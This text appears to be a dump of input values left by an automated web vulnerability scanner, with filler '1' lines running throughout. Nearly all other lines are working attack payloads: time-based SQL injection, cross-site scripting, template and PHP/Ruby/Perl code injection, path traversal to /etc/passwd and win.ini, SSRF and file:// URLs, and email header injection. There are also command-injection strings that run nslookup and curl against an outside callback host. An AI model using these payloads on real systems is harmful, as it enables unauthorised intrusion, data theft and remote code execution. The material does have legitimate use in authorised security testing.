1

@@0jzwN

1

1����%2527%2522

1

1'"

1

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1

1

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1

1

1

fxMGQFdD')) OR 48=(SELECT 48 FROM PG_SLEEP(15))--

1

@@bLCm4

1

1����%2527%2522

1

1'"

1

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1

GVKJsBNn') OR 981=(SELECT 981 FROM PG_SLEEP(15))--

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1

hnlYK7N4' OR 455=(SELECT 455 FROM PG_SLEEP(15))--

1

zbgKOpXx')) OR 561=(SELECT 561 FROM PG_SLEEP(15))--

1

-1)) OR 218=(SELECT 218 FROM PG_SLEEP(15))--

1

jGpBx1WD') OR 667=(SELECT 667 FROM PG_SLEEP(15))--

1

-5) OR 635=(SELECT 635 FROM PG_SLEEP(15))--

1

393FXItk' OR 125=(SELECT 125 FROM PG_SLEEP(15))--

1

-5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--

1

-1)) OR 666=(SELECT 666 FROM PG_SLEEP(15))--

1

pl9mC7lw')); waitfor delay '0:0:15' --

1

-5) OR 409=(SELECT 409 FROM PG_SLEEP(15))--

1

QQHXleYS'); waitfor delay '0:0:15' --

1

-5 OR 284=(SELECT 284 FROM PG_SLEEP(15))--

1

XWkabmv6'; waitfor delay '0:0:15' --

1

k4B4iTWM')); waitfor delay '0:0:15' --

1

1 waitfor delay '0:0:15' --

1

Gh6jKKWD'); waitfor delay '0:0:15' --

1

-1)); waitfor delay '0:0:15' --

1

5IDloh5q'; waitfor delay '0:0:15' --

1

-1); waitfor delay '0:0:15' --

1

1 waitfor delay '0:0:15' --

1

-1; waitfor delay '0:0:15' --

1

-1)); waitfor delay '0:0:15' --

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1

-1); waitfor delay '0:0:15' --

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1

-1; waitfor delay '0:0:15' --

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1

if(now()=sysdate(),sleep(15),0)

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1

-1" OR 2+769-769-1=0+0+0+1 --

1

-1' OR 2+508-508-1=0+0+0+1 or 'QFZBAidN'='

1

-1' OR 2+374-374-1=0+0+0+1 --

1

-1 OR 2+561-561-1=0+0+0+1

1

-1 OR 2+320-320-1=0+0+0+1 --

1

GbxUHDx8

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1

1

1

if(now()=sysdate(),sleep(15),0)

1

1

1

-1" OR 2+966-966-1=0+0+0+1 --

1

-1' OR 2+858-858-1=0+0+0+1 or 'CuF1s6Qi'='

1

-1' OR 2+222-222-1=0+0+0+1 --

1

-1 OR 2+322-322-1=0+0+0+1

1

-1 OR 2+768-768-1=0+0+0+1 --

1

3yeLDhHy

@@YJeLN

1

1'"

1

1

1

1

1

@@KI8TP

1

1'"

1

T2WCrgE1

1

1

1

1

1

1

1

1

1

1

1

1

1

peA8hUGw

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1<aCChLN6<

1

1<a2gphf5 x=9435>

1

1

1

1

1

<a HrEF=jaVaScRiPT:>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

dfb{{98991*97996}}xca

1

1

1

1

1

<th:t="${dfb}#foreach

1

1

1

1

1

<%={{={@{#{${dfb}}%>

1

1

1

19591262

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

19670280

1

'"()&%<zzz><ScRiPt >ZNh8(9996)</ScRiPt>

1

1'"()&%<zzz><ScRiPt >ZNh8(9751)</ScRiPt>

1<amKUk0b<

1

1<anVDPF4 x=9385>

1

1

1

1

1

<a HrEF=jaVaScRiPT:>

1

1

1

1

1

1

19892656

1

'"()&%<zzz><ScRiPt >H15q(9703)</ScRiPt>

1

1'"()&%<zzz><ScRiPt >H15q(9711)</ScRiPt>

1

1

1<aIDqvtm<

1

1

1

1<aFdQro2 x=9533>

1

1

1

<a HrEF=jaVaScRiPT:>

1

1

1

dfb{{98991*97996}}xca

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1"||sleep(27*1000)*gklpza||"

<th:t="${dfb}#foreach

1

1

1'||sleep(27*1000)*kcfjxy||'

1

1"&&sleep(27*1000)*pjioje&&"

1

1

1

1'&&sleep(27*1000)*cmyqmo&&'

1

'"()

1

<%={{={@{#{${dfb}}%>

1

1

1

1

1

1

1

19473104

1

'"()

1

1

;(nslookup -q=cname hitonsqggvdxo45fd3.bxss.me||curl hitonsqggvdxo45fd3.bxss.me)|(nslookup -q=cname hitonsqggvdxo45fd3.bxss.me||curl hitonsqggvdxo45fd3.bxss.me)&(nslookup -q=cname hitonsqggvdxo45fd3.bxss.me||curl hitonsqggvdxo45fd3.bxss.me)

1

`(nslookup -q=cname hityfucflniil04f1f.bxss.me||curl hityfucflniil04f1f.bxss.me)`

1

1

'.print(md5(31337)).'

1

1

${@print(md5(31337))}\

1

${@print(md5(31337))}

1

";print(md5(31337));$a="

1

1

1

';print(md5(31337));$a='

1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

1

1

1

1

|(nslookup -q=cname hitnguphuoujr1e510.bxss.me||curl hitnguphuoujr1e510.bxss.me)

1

1

1

1

'.print(md5(31337)).'

1

1

&(nslookup -q=cname hituxvxxgqkvv746aa.bxss.me||curl hituxvxxgqkvv746aa.bxss.me)&'\"`0&(nslookup -q=cname hituxvxxgqkvv746aa.bxss.me||curl hituxvxxgqkvv746aa.bxss.me)&`'

1

1

1

&nslookup -q=cname hitnirlthbljgf51d2.bxss.me&'\"`0&nslookup -q=cname hitnirlthbljgf51d2.bxss.me&`'

1

$(nslookup -q=cname hitmkamevpvpt1255a.bxss.me||curl hitmkamevpvpt1255a.bxss.me)

dfb{{98991*97996}}xca

1

1

<!--

${@print(md5(31337))}

1

1

(nslookup -q=cname hitckxxohkpym947f3.bxss.me||curl hitckxxohkpym947f3.bxss.me))

1

1|echo xfvjvw$()\ btmwtd\nz^xyu||a #' |echo xfvjvw$()\ btmwtd\nz^xyu||a #|" |echo xfvjvw$()\ btmwtd\nz^xyu||a #

1

1

|echo iuhkbl$()\ welarg\nz^xyu||a #' |echo iuhkbl$()\ welarg\nz^xyu||a #|" |echo iuhkbl$()\ welarg\nz^xyu||a #

1

'"

<!--

1

1

1

1

1

1

1

1

1&echo njomzx$()\ jwzzkf\nz^xyu||a #' &echo njomzx$()\ jwzzkf\nz^xyu||a #|" &echo njomzx$()\ jwzzkf\nz^xyu||a #

1

1

1

bxss.me

'"

1

1

'+'A'.concat(70-3).concat(22*4).concat(121).concat(80).concat(119).concat(77)+(require'socket' Socket.gethostbyname('hitfj'+'mywkzqbr993c1.bxss.me.')[3].to_s)+'

1

c:/windows/win.ini

1

1

1

1

1

&echo hnsbsx$()\ xlyark\nz^xyu||a #' &echo hnsbsx$()\ xlyark\nz^xyu||a #|" &echo hnsbsx$()\ xlyark\nz^xyu||a #

1

"+"A".concat(70-3).concat(22*4).concat(117).concat(82).concat(110).concat(70)+(require"socket" Socket.gethostbyname("hitcy"+"ilmwpnof9f320.bxss.me.")[3].to_s)+"

1

1

1

bxss.me/t/xss.html?%00

1

1

1

1

1

echo hrpxkg$()\ pjewsu\nz^xyu||a #' &echo hrpxkg$()\ pjewsu\nz^xyu||a #|" &echo hrpxkg$()\ pjewsu\nz^xyu||a #

1

HttP://bxss.me/t/xss.html?%00

1

/etc/shells

1

1

1

http://bxss.me/t/fit.txt%3F.jpg

1

1

1

1

1

1

1

xfs.bxss.me

1

Http://bxss.me/t/fit.txt

1

1

xfs.bxss.me

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../1

1

1

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1

1

1

1

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1

file:///etc/passwd

1

1

<th:t="${dfb}#foreach

1

bxss.me

1

1

1

1

1

1

../../../../../../../../../../../../../../windows/win.ini

1

1

1

".gethostbyname(lc("hitru"."qhjliqqx99752.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(72).chr(110).chr(80)."

1

'.gethostbyname(lc('hitov'.'ldfvjmyt98fbe.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(89).chr(110).chr(83).'

1

1

c:/windows/win.ini

1

1

1

1

1

/etc/shells

1

1

1

1

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1

../../../../../../../../../../../../../../etc/passwd

1

1

../1

1

1

1

1

1

1

1

1

<%={{={@{#{${dfb}}%>

1

1

1

1

^(#$!@#$)(()))******

1

1

file:///etc/passwd

1

1

!(()&&!|*|*|

1

1

1

)

1

1

^(#$!@#$)(()))******

1

1

1

1

1

1

1

1

1

1

1

1

1

1

!(()&&!|*|*|

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

)

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1<esi:include src="http://bxss.me/rpb.png"/>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

${9999912+9999366}

1

1

${10000495+10000271}

1

1

1

1

1

1

1

1

1

1

1

1

1

1

to@example.com>%0d%0abcc:009247.36527-118412.36527.97e4d.19824.2@bxss.me

1

1

1

1

1

1

19998420

1

1

1%0abcc:009247.36527-118411.36527.97e4d.19824.2@bxss.me

1

1

1

1

1

1

1

/../../../../../../../../../../windows/system32/BITSADMIN.exe

1

"+response.write(9540329*9604656)+"

1

1

1

1

1

1

1

1

1

'+response.write(9540329*9604656)+'

1

1

1

1

1

1

1

1

1

response.write(9540329*9604656)

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

<!--

1

1

1

;(nslookup -q=cname hitgjvdvekkmd5e2e6.bxss.me||curl hitgjvdvekkmd5e2e6.bxss.me)|(nslookup -q=cname hitgjvdvekkmd5e2e6.bxss.me||curl hitgjvdvekkmd5e2e6.bxss.me)&(nslookup -q=cname hitgjvdvekkmd5e2e6.bxss.me||curl hitgjvdvekkmd5e2e6.bxss.me)

1

1

1

`(nslookup -q=cname hitzgvrqevxgn24a4e.bxss.me||curl hitzgvrqevxgn24a4e.bxss.me)`

1

'"

1

1

1

'.print(md5(31337)).'

1

1

1

1"||sleep(27*1000)*tphydc||"

1

${@print(md5(31337))}\

1

|(nslookup -q=cname hitgrpivnbyrqdd4db.bxss.me||curl hitgrpivnbyrqdd4db.bxss.me)

<!--

1

1

&(nslookup -q=cname hitunkkpkwkmy11688.bxss.me||curl hitunkkpkwkmy11688.bxss.me)&'\"`0&(nslookup -q=cname hitunkkpkwkmy11688.bxss.me||curl hitunkkpkwkmy11688.bxss.me)&`'

'"

1

1

${@print(md5(31337))}

1

1'||sleep(27*1000)*bssrfm||'

1

1